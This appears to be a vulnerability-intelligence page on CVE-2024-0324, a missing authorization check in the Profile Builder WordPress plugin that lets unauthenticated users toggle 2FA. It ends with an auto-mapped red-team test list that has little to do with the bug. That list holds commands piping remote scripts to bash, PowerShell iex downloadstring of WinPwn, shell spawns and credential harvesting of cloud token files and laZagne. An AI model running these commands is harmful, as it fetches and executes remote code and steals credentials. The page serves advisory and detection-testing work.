CVE-2024-0324
Overview
This vulnerability is an authorization bypass caused by the absence of a capability check within the 'wppb_two_factor_authentication_settings_update' function in the User Profile Builder WordPress plugin. The flaw resides in the plugin's administrative function responsible for updating two-factor authentication (2FA) settings, affecting all versions up to and including 3.10.8. The missing permission validation allows modification of 2FA configuration for arbitrary user roles without verifying the requester's privileges.
Vulnerability Description
The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.
Impact
An unauthenticated attacker can remotely enable or disable two-factor authentication for any user role within the WordPress site using this vulnerability. This unauthorized modification can weaken the site's security posture by disabling 2FA protections or enabling 2FA for roles without consent. The attack requires no authentication or user interaction and can be executed over the network, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can facilitate privilege escalation or lateral movement within the affected WordPress environment.
Solution
Users should upgrade the User Profile Builder plugin to a version later than 3.10.8 where the missing capability check has been implemented. The vendor's patch, referenced in the WordPress plugin repository changeset 3022354, adds proper permission validation in the 'wppb_two_factor_authentication_settings_update' function. Detailed patch instructions and verification steps are available at the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40) and the WordPress plugin directory repository.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the User Profile Builder plugin for WordPress is characterized by a missing capability check in the function responsible for updating two-factor authentication (2FA) settings. This oversight allows unauthorized users to manipulate the 2FA functionality, which is intended to enhance security by requiring a second form of verification during user authentication. The absence of proper access controls means that any unauthenticated attacker can enable or disable 2FA for any user role, undermining the plugin's security framework. This flaw is particularly concerning given the increasing emphasis on multi-factor authentication as a critical component of cybersecurity best practices.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage automated scripts to send requests to the vulnerable endpoint, altering the 2FA settings without needing to authenticate. This could be executed from any network location, making it a low-barrier attack for individuals with malicious intent. Once the attacker gains control over the 2FA settings, they can disable this security feature for high-privilege user roles, such as administrators or editors, thereby facilitating further attacks, including account takeover, data exfiltration, or even the installation of backdoors within the WordPress environment.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the User Profile Builder plugin to manage user authentication and roles. The potential for unauthorized access to sensitive user accounts can lead to data breaches, loss of customer trust, and reputational damage. Businesses may face regulatory repercussions if user data is compromised, especially in sectors governed by stringent data protection laws. The risk extends beyond immediate financial loss; it can also affect long-term business viability as customers increasingly prioritize security in their choice of service providers.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and vulnerability assessments are essential to identify weaknesses in plugins and themes used within WordPress installations. Employing web application firewalls (WAFs) can help filter out malicious requests targeting the vulnerable function. Additionally, organizations should ensure that they are using the latest version of the plugin, as updates often include patches for known vulnerabilities. Educating users about the importance of 2FA and encouraging them to monitor their account settings can also serve as a proactive measure against potential exploitation.
In conclusion, the vulnerability in the User Profile Builder plugin presents a serious threat to WordPress installations, particularly in terms of unauthorized access and data integrity. The ease of exploitation combined with the potential for significant business impact underscores the necessity for organizations to prioritize security measures. By adopting comprehensive detection and mitigation strategies, businesses can better protect themselves against the risks associated with this and similar vulnerabilities, ensuring a more secure online environment for their users.
CSURFACE threat intelligence has identified a revision in the severity rating of CVE-2024-0324, with the CVSS score increasing from 7.5 to 8.2. This adjustment reflects a deeper understanding of the vulnerability’s potential impact, particularly emphasizing the ease with which unauthenticated attackers can manipulate two-factor authentication settings across arbitrary user roles. Our telemetry indicates that while the exploitability remains stable, the emergence of a publicly available proof-of-concept exploit has heightened the risk profile, making targeted attacks more feasible. This development underscores the vulnerability’s elevated threat to WordPress environments relying on the User Profile Builder plugin, as attackers can now more readily bypass security controls to alter authentication mechanisms. Consequently, the risk assessment shifts to a higher threat level, signaling that defenders must recognize the increased likelihood of exploitation attempts and the broader implications for user account security and data integrity within affected systems.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cozmoslabs | Profile Builder | All |
cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
kodaichodai/CVE-2024-0324
a PoC for CVE-2024-0324/WP Plugin - Profile Builder (<= 3.10.8)
|
kodaichodai | 0 | 0 | 2024-01-01 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
47%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-0324 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve |
| github.com |
GitHub CVE
|
https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3022354/ |